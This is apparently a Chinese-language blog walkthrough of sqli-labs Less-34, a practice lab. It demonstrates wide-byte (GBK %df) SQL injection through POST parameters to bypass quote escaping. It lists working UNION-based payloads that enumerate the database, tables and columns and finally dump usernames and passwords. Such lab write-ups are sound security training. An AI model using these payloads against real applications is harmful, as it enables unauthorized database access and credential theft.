sqli-labs (less-34)

最新推荐文章于 2024-04-18 10:17:51 发布
最新推荐文章于 2024-04-18 10:17:51 发布
阅读量1.5k 收藏 8
点赞数 2
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/114783920
版权

sqli-labs (less-34)

进入34关,我们发现又回到了我们熟悉的页面,我们直接输入用户名和密码登入进去

像之前的关卡一样,我们输入的用户名和密码也是使用POST的方式传输到了服务器,所以我们继续使用hackbar工具抓取POST内容

在用户名的位置我们输入一个单引号试试,结果发现单引号被转义


那我们在密码的位置尝试输入一个单引号试试,结果发现也被转义

这里一般情况下就已经没有注入点了,但我们可以查看源代码看看这关是不是也使用了GBK编码

查看源代码可知确实使用了GBK编码,那就很简单了,直接在单引号前面加上%df让单引号成功逃逸

uname=admin%df'&passwd=admin&submit=Submit


通过错误信息判断闭合方式为’#,并且为字符型注入

判断字段数

uname=a%df' order by 2 #&passwd=admin&submit=Submit #回显正常
uname=a%df' order by 3 #&passwd=admin&submit=Submit #回显错误


判断字段数为2

确定回显位置

uname=a%df' union select 1,2#&passwd=admin&submit=Submit


查看当前库

uname=a%df' union select 1,database()#&passwd=admin&submit=Submit


查看security库下的所有表

uname=a%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())#&passwd=admin&submit=Submit


这里注意单引号被转义的问题就可以了

查看users表下的所有字段

uname=a%df' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)#&passwd=admin&submit=Submit


这里我将users表转化为了16进制

查看username,password字段下的所有值

uname=a%df' union select 1,(select group_concat(username,password) from security.users)#&passwd=admin&submit=Submit

super 硕
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1763
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯指南 32、33、34、35、36、37)—宽字节注入
Sqli-labs靶场详细攻略Less 34-37
qq_41755084的博客
10-31 970
这一还是进行宽字节注入,与上一的区别在于使用了post方法进行传递。先试一下上一的注入代码。因为这一是登录,就使用之前的dumb账号。登陆失败了,也没报错,看一下这个包传递时post方法里参数是咋传的。可以看到,我们输入的注入代码在前端被进行了一个url编码,%被编码成了%25,原来的空格被替换成了+,原来的+被替换成了%2b那我们再把这个包改回来就好,+不用改回空格,在服务端会改回来的。并且经过尝试,这里的列数为2。注入成功。
SQLi LABS Less-34 报错注入
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第三十八 SQLi38
SQLi LABS Less-34_sqli-labs第三十四,2024年最新网络安全性能优化面试题集锦
2401_83974607的博客
04-18 426
【代码】SQLi LABS Less-34_sqli-labs第三十四,2024年最新网络安全性能优化面试题集锦。
SQL-labs的第34——报错注入 宽字节注入(POST)
qq_73393033的博客
08-09 340
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法中和反斜杠。
Sqli-labs之Less-34
→_→
05-02 2194
Less-34 基于错误_POST_单引号_字符型_addslashes()_宽字节注入 《注入天书》中介绍因 POST 不能进行 URLencode,可使用 UTF-8 转 UTF-16 或 UTF-32,实践中发现正常的宽字节注入仍有效,猜测是编码的问题,待解决。 一个参考:...
SQLi-LAS 3 4 卡宫攻略
Hjdnknd的博客
06-13 155
第三1.先查看闭合?id=1\可以看到是‘)2.?id=1') order by 3 -- -查看字段是33.?id=-1 union select 1,2,3 -- -查看可用的爆破点位4.?id=-1 union select 1,version(),database() -- -查看版本和当前库 5.?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=
sqli-labs(23-37)
qq_43395215的博客
08-26 409
文章目录第23:第24:第25:第26:第27:第28:第29:第30:第31:第32:第33:第34:第35:第36:第37: 第23: 23感觉和第1一样,先用第一的操作试一试,先判断闭合方式 /Less-23/?id=1' and 1=2 --+ 判断所有的闭合方式都是无效,但是在报错信息里面,有于“’ LIMIT 0,1’的提示,按理说不应该出现才对,因为我们注入的sql语句后面有注释符,这一部分应该是被注释的,所以应该是注释被屏蔽了,所以我们采用另一种构造
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs(34)
weixin_30611509的博客
06-01 679
0x01构造闭合 同样 发现 ’被注释掉了 试探了一波发现什么信息都不会返回 正确错误的页面都一样 之前我们的方法就是将过滤函数添加的 \ 给吃掉。而get型的方式我们是以url形式提交的,因此数据会通过URLencode,如何将方法用在post型的注入当中,我们此处介绍一个新的方法。将utf-8转换为utf-16或 utf-32,例如将 ' 转为utf-16为�' ...
sqli-labs-master靶场搭建
m0_49420271的博客
06-07 664
sqli-labs-master靶场简单搭建
SQL注入 Less34(POST型宽字节注入+布尔盲注)
开心星人的博客
07-28 680
因为"users"用到了引号,使用子查询或者16进制方式(这个出了点问题,没出来)发现没有效果,并且%df直接显示出来了(之前都是显示不出来,是一个问号的图形)我们用burp进行宽字节注入即可。抓包,发现对%进行了URL编码。进行了转义,使用宽字节注入。......
sqli-labs/Less-34
m0_71299382的博客
11-21 344
sqli-labs第三十四
sqli-labs————Less-34(宽字节绕过、水平越权、盲注)
Fly_鹏程万里
05-19 2507
Less-34方法一:这一是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: �'。我们可以利用这一点注...
sql-labs闯32~37
qq_44663230的博客
09-04 2032
sql-labs闯32~37 宽字节注入集合
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值